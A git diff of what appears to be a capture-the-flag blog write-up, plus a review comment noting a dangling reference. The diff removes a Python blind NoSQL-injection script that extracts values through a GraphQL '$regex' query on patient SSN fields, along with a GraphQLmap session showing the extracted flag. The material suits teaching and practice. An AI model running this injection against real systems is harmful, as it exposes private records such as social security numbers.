Fix Part 1 - HIP
parent
ce0b6c9142
commit
2d816cd5c9
@ -169,31 +169,3 @@ The injection worked, now we can re-use the payload from the challenge #2 and ex
{% endhighlight %}

Obviously we scripted the data extraction in Python, the script below will get the last flag : `4f537c0a-7da6-4acc-81e1-8c33c02ef3b`.

{% highlight python %}
def blind_nosql(URL):
    data = ""
    data_size = 35
    charset = "0123456789abcdef-"
    while len(data) != data_size:
        for c in charset:
            query ="{doctors(options:%20%22{\%22\%22patients.ssn\%22:1}%22,%20search:%20%22{%20\%22patients.ssn\%22:%20{%20\%22$regex\%22:%20\%22^PLACEHOLDER\%22},%20\%22lastName\%22:\%22Admin\%22%20,%20\%22firstName\%22:\%22Admin\%22%20}%22){id, firstName}}"
            injected = (URL.format(query)).replace("PLACEHOLDER", data + c)
            r = requests.get(injected)
            if r.json()['data']['doctors'] != []:
                data += c
                print("\033[92m[+] Data found:\033[0m {}".format(data))
{% endhighlight %}

At that time we were checking if the content of `r.json()['data']['doctors']` was not empty, in order to abstract the data extraction we now take a check input from the user in order to compare the output.

{% highlight json %}
GraphQLmap > nosqli
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
Check > 5d089c51dcab2d0032fdd08d
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
{% endhighlight %}

I hope you enjoyed the challenges as I did !

Feel free to share the blog post ! :)
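Review bot: the surviving context sentence "Obviously we scripted the data extraction in Python, the script below will get the last flag" still points at a script that this hunk removes. The header `@ -169,31 +169,3 @@` shrinks the section from 31 lines to 3, and the only lines that appear twice in the split view (both sides) are `{% endhighlight %}` and that sentence, so the `blind_nosql` script, the GraphQLmap `nosqli` transcript with the `Check > 5d089c51dcab2d0032fdd08d` line, and the closing lines are what is dropped. Either move the sentence together with the script or reword it so the post does not end on a dangling "the script below", and have the commit message say where the removed walkthrough and flag went; "Fix Part 1 - HIP" does not explain the deletion.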